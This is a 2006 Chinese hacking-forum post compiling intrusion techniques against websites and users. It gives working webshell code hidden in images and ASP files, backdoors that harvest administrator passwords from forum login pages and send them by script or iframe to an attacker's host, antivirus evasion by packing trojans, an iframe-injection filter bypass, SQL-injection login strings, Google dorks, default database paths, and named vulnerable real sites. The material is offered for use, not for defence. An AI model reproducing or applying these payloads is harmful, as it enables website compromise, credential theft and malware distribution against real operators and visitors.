飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

查看: 2404|回复: 0

黑客入侵技术总结

[复制链接]
  • TA的每日心情

    2022-1-22 22:38
  • 签到天数: 16 天

    [LV.4]偶尔看看III

    发表于 2006-3-10 21:36:25 | 显示全部楼层 |阅读模式
    黑客入侵技术总结
    来源: 光之林红客教程网   

    1.名称:如何制作图片ASP木马   (可显示图片)  
    建一个asp文件,内容为<!--#include file="ating.jpg"-->
    找一个正常图片ating.jpg,插入一句话木马(比如冰狐的),用ultraedit进行hex编译,插入图片里,为了运行成功,还要搜索<%和%>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入
    <SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(‘#’)+’’) </SCRIPT>
    2. 名称:整蛊网吧
    先用精锐网吧辅助工具得到用户名和密码,然后用计算机管理联结一台机器,开telnet,连接,开共享,复制一个木马过去运行即可。
    3.名称:感受MD5暴力破解的魅力
    rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all"
    1和7代表密码最小和最大长度
    阿汀我再加个方法:http://md5.rednoize.com/ 在线破解
    或者到http://www.md5lookup.com/?category=01-3&searck=on
    4.很多时候我们做免杀木马,不用懂汇编,用北斗加壳程序就能逃杀,还有很多加壳软件,大家木马加壳的时候最好多选择不知名的加壳软件
    5.名称:隐蔽的插入型ASP木马  
    (1)在我们要做手脚的asp文件里加入如下内容
    <%if request(“action”)=”ok” then%>
    shell代码插在这里,最好是小马,还要加密一下
    <%end if%>
    访问的时候在你作手脚的asp文件后面加上?action=ok,即可
    (2)另一种方法,在我们要做手脚的asp文件里加入如下内容
    <%
    on error resume next
    strFileName = Request.QueryString(“filer”)
    set objStream = Server.CreateObject(“ABODB.Stream”)
    objStream.Type = 1
    objStream.Open
    objStream.LoadFromFile strFileName
    objStream.SaveToFile Server.mappath(“ating.asp”),2
    %>
    访问的时候在做手脚的asp文件后面加上?filer=XXX   
    XXX为你本地上传的一个路径如 c:\ating123.asp
    上传后在做手脚的asp的同文件夹中有ating,asp
    (3)前提得到system权限,
    进入网站目录下一层
    mkdir s…\
    copy ating.asp s…/
    这样杀毒软件找不到的
    访问http://网站/s…/ating.asp即可
    6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在该电脑生成一个超级用户 用户名为:hack  密码110,在DOS下和计算机管理器上看不到你建立的用户,并且是删除不掉的
    7.名称:QQ群脚本攻击
    打开qq对话诓,复制消息,然后
    下面的内容保存为.vbs 文件,运行即可
    Set WshShell= WScript.Createobject("WScript.Shell")
    WshShell.AppActivate  "QQ信息攻击脚本"
    for i=1 to 20
    WScript.Sleep 1000
    WshShell.SendKeys"^v"
    WshShell.SendKeys i
    WshShell.SendKeys "%s"
    Next
    8.搜索:程序制作:万鹏 有免费申请空间的,直接上传asp马即可
    9. 名称:全面找出你站上的ASP木马
    (1) 用杀毒软件
    (2) 用FTP客户端软件,点"工具"->"比较文件夹"
    (3) 用asplist2.0.asp上传到站点空间查看,一般功能多的ASP我估计就是ASP木马
    (4) 用工具Beyond Compare
    10名称:拓展思路拿DVBBS帐号 “一个人的圣经”的动画
      (1)以前获得webshell后想进入DVBBS的后台,想要管理员的密码,可以这样
    老办法:
    修改admin_login.asp得到明文DVBBS后台密码  
    在"username=trim(replace(request("username")这行后面  
    Dim fsoObject  
    Dim tsObject  
    Set fsoObject = Server.CreateObject("Scripting.FileSystemObject")  
    set tsObject = fsoObject.CreateTextFile(Server.MapPath("laner.txt"))  
    tsObject.Write CStr(request("password"))  
    Set fsoObject = Nothing  
    Set tsObject = Nothing  
    只要管理员登陆后台,在目录下就生成了laner.txt
      (2)login.asp中Case "login_chk"下:  
    on error resume next
    Dim rain
    set rain=server.createobject("adodb.stream")
    rain.Type=2
    rain.CharSet="gb2312"
    rain.Position=rain.Size  
    rain.Open
    rain.LoadFromFile server.MapPath("laner.asp")
    rain.writetext now&request("username")&"text:"&request("password")&chr(10)  
    rain.SaveToFile server.MapPath("laner.asp"),2  
    rain.Close  
    set rain=nothing
    这样laner.asp将获得全部登陆人的登陆时间,用户名和密码
       (3)如果你有自己的网站或者另外的webshell(强烈建议使用):  
    可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp:  
    <%if request("n")<>"" and request("p")<>"" then  
    on error resume next
    Dim rain
    set rain=server.createobject("adodb.stream")
    rain.Type=2
    rain.CharSet="gb2312"
    rain.Position=rain.Size  
    rain.Open
    rain.LoadFromFile server.MapPath("laner.asp")
    rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
    rain.SaveToFile server.MapPath("laner.asp"),2  
    rain.Close  
    set rain=nothing  
    end if%>  
    11. 名称:利用QQ在线状态抓鸽子肉鸡
    生成qq在线状态,把里面的地址改成木马地址,发到论坛
    在login.asp那里插入一句:  
    response.write"<scriptsrc=http://www.ptlushi.com/laner/rain.asp?n="&request("username")&""&"&p="&request("password")&"></script>"
    response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request("username")&""&"&p="&request("password")&"></iframe>"
    结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里
    12. 动画名称:媒体中国整站程序存在多处漏洞
    漏洞程序:媒体中国整站程序(第一版)
    官方网站:http://meiti.elgod.com/
    漏洞: %5c(暴库)  上传  注入
    上传页面:down1/upload.asp
    13. 名称:免费电话+MSH命令行工具
    http://www.globe7.com/ 打开主页,点击坐下角,Free DownLoad,下载到本地,安装,
    运行后,会提示正在寻找你所在地区的区号。由于是国际长途,注册一个帐号,送100美分,国内计时0.01/分,你就有100分钟可以白打。是一个帐号哦。
    要注意的就是,固定电话,小灵通 形式为0086521123456   521本来时0521,要省略前面的零,手机号也是一样。
    14. 名称:Bo-Blog的新漏洞
    http://网址/index.php?job=../admin/ban
    把其中“禁止搜索的词”那部分<table>另存出来,里面的地址改完整,插入一句话木马
    15. 名称:钩魂者入侵传奇私服
    用百度 搜索 传奇 inurl:tuku   
    或者 传奇 inurl:wplm.htm   
    再或者 传奇 inurl:coolsites.asp
    友情链接里插入一句话木马即可
    16. 程序: 宏达企业整站上传漏洞  
    官方主页:http://www.mu126.com/
    漏洞页面:/cx/upfile.asp (上传漏洞)   
    17.无间盗邮箱,在修改密码里,用户名和密码里添’or’=’or’
    18.名称: bbsxp5.16后台得到webshell
    bbsxp5.16过滤了 asp,asp,cdx,cer,扩展名的文件上传,就是在基本设置上添加上上传类型也不行,并禁止了修改数据备份数据名称,我们可以把此网页保存在本地,改源代码上传。
    19.名称:JHACKJ 2005年最新精典教程
    下载看看吧,不错,各大网站都有
    20.名称:省力入侵韩国肉鸡
    在啊D的扫描注入点项,打开这个:http://www.google.co.kr/advanced_search?hl=zh-CN
    这是高级搜索项,关键字随便写。这里我写asp?name=  设置为每页显示100条。
    语种选择韩文。搜索,很多sa.
    21.名称:任何网吧的管理系统破解
    选智能ABC,然后vv输入,光标后退两步,按Delete键 刚输入的两个vv删除
    最后按Inter键   
    22.名称:破解QQ空间插入网页木马的代码
    现在腾讯 已经封了很多QQ空间代码了   就如 以前 <iframe src="木马地址" name="lcx" width="0" height="0" frameborder="0"></iframe>插入网页木马的代码也早被封了   
    突破禁用的方法 代码如下:
    <div id=DI><img src="javascript:DI.&#105;nnerHTML=’<&#105;frame src=木马地址 width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no></&#105;frame>’" style=display:none></div>
    最后附上 卡拉是条ok 总结的
    1.上传漏洞[不多讲]
      pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”,80%就有漏洞了!
    有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.
    2.注入漏洞[不多讲]
      pS:对MD5密码.有时我们不是哪么容易跑出来.如果是[SQL数据库].那么我们可以用以下命令:
         http://注入网址;update admin set password=’新MD5密码’ where password=’旧MD5密码’--      [admin为表名.]

    3.旁注,也就是跨站.
    我们入侵某站时可能这个站坚固的无懈可击,我们可以找下和这个站同一服务器的站点,然后在利用这个站点用提权,嗅探等方法来入侵我们 要入侵的站点。,在这里有个难点,就是一些服务器的绝对路径经过加密,这就看我们的本事了
       

    4.暴库:把二级目录中间的/换成%5c  
      EY:http://www.ahttc.edu.cn/otherweb ... s.asp?BigClassName=职责范围&BigClassType=1
      如果你能看到:’E:\ahttc040901\otherweb\dz\database\iXuEr_Studio.asa’不是一个有效的路径。 确定路径名称拼写是否正确,以及是否  连接到文件存放的服务器。
      这样的就是数据库了。下载时用FLASHGET换成.MDB格式的就行.
       
    5.’or’=’or’这是一个可以连接SQL的语名句.可以直接进入后台。我收集了一下。类似的还有:
      ’or’’=’  " or "a"="a     ’) or (’a’=’a     ") or ("a"="a    or 1=1--   ’ or ’a’=’a
    6.社会工程学。这个我们都知道吧。就是猜解。
     EY:http://www.neu.edu.cn/waishi/admin
            admin   waishi
    7.写入ASP格式数据库。就是一句话木马[<%execute request("value")%> ],常用在留言本.
      EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[这个就是ASP格式的数据库],再写入一句话木马
       
    8.源码利用:一些网站用的都是网上下载的源码.有的站长很菜.什么也不改.
      EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp  
      这个站用的是:杰出校友录,源码我下过了,
      默认数据库/webshell路径:\database\liangu_data.mdb 后台管理:adm_login.asp 密码及用户名都是admin
          
    9.默认数据库/webshell路径利用:这样的网站很多/利人别人的WEBSHELL.
    /Databackup/dvbbs7.MDB
    /bbs/Databackup/dvbbs7.MDB
    /bbs/Data/dvbbs7.MDB
    /data/dvbbs7.mdb
    /bbs/diy.asp
    /diy.asp
    /bbs/cmd.asp
    /bbs/cmd.exe
    /bbs/s-u.exe
    /bbs/servu.exe
    工具:网站猎手  挖掘鸡
    EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
    10.查看目录法:人一些网站可以断开目录,可以方问目录。
    EY:http://www.ujs168.com/shop/admin/
        http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
        这样我们可以找到数据库,下载不用我教吧
    11.工具溢出:.asp?NewsID=   /2j.asp?id=18   .asp?id=[这种方法可以取得大量的WEBSHELL]
                
    12.搜索引擎利用:
       
    (1).inurl:flasher_list.asp   默认数据库:database/flash.mdb   后台/manager/
    (2).找网站的管理后台地址:
    site:xxxx.comintext:管理
    site:xxxx.comintitle:管理   <关键字很多,自已找>
    site:xxxx.cominurl:login
    (3).查找access的数据库,mssql、mysql的连接文件
    allinurl:bbsdata
    filetype:mdbinurl:database
    filetype:incconn
    inurl:datafiletype:mdb
    我主不做了。。自已做做吧。。
    13.COOKIE欺骗:把自己的ID修改成管理员的,MD5密码也修改成他的,用桂林老兵工具可以修改COOKIE。这个我就不多讲了

    14.利用常见的漏洞:如动网BBS
    EY:http://js1011.com/bbs/index.asp
    可以先用:dvbbs权限提升工具,使自已成为前台管理员。
    THEN,运用:动网固顶贴工具,找个固顶贴,再取得COOKIES,这个要你自已做。我们可以用WSockExpert取得Cookies/NC包
    这个我就不做了,网上教程多的是,自已下个看看。
    工具:dvbbs权限提升工具   动网固顶贴工具
    15.还有一些老漏洞。如IIS3,4的查看源码,5的DELETE
       CGI,PHP的一些老洞,我就不说了啊。。太老了。没有什么大用途
    PYG19周年生日快乐!
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表